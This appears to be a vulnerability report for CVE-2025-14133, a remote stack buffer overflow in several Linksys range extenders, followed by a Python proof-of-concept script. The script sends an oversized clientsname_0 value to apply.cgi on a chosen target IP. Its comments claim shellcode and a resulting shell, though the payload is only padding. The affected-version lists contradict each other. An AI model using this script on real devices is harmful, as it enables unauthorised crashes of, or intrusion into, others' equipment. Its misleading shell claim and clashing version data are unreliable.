Security Vulnerability Report
CVE-2025-14133 CVSS 8.8 HIGH

Published: 2025-12-06 11:15:47
Last Modified: 2025-12-10 18:00:39

Description

A vulnerability was found in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this vulnerability is the function AP_get_wireless_clientlist_setClientsName of the file mod_form.so. Performing manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6350_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6350:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re7000_firmware:1.1.05.003:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re7000:-:*:*:*:*:*:*:* - NOT VULNERABLE
Linksys RE6500 firmware < 1.0.013.001
Linksys RE6250 firmware < 1.0.04.001
Linksys RE6300 firmware < 1.0.04.002
Linksys RE6350 firmware < 1.1.05.003
Linksys RE7000 firmware < 1.2.07.001
Linksys RE9000 firmware < 1.0.013.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-14133 PoC - Linksys RE6500/RE9000 Stack Buffer Overflow
AP_get_wireless_clientlist_setClientsName Function
Note: This is for educational and authorized testing purposes only
"""
import requests
import sys

TARGET_IP = "192.168.1.1"  # Router IP
TARGET_PORT = 80
PAYLOAD_SIZE = 1024  # Overflow payload size


def create_exploit_payload():
    """Generate overflow payload"""
    # Shellcode for MIPS architecture (Linksys device)
    # NOP sled + shellcode + return address
    padding = b'A' * PAYLOAD_SIZE
    return padding


def exploit_cve_2025_14133():
    """Exploit the buffer overflow vulnerability"""
    url = f"http://{TARGET_IP}:{TARGET_PORT}/apply.cgi"
    # Payload for AP_get_wireless_clientlist_setClientsName
    params = {
        "clientsname_0": create_exploit_payload(),
        "submit_button": "Wireless_ClientList",
        "change_action": "gozila_cgi"
    }
    try:
        print(f"[*] Sending exploit payload to {TARGET_IP}...")
        response = requests.post(url, data=params, timeout=10)
        print(f"[*] Request sent. Status code: {response.status_code}")
        print(f"[*] Check if shell is available on target")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_IP = sys.argv[1]
    exploit_cve_2025_14133()
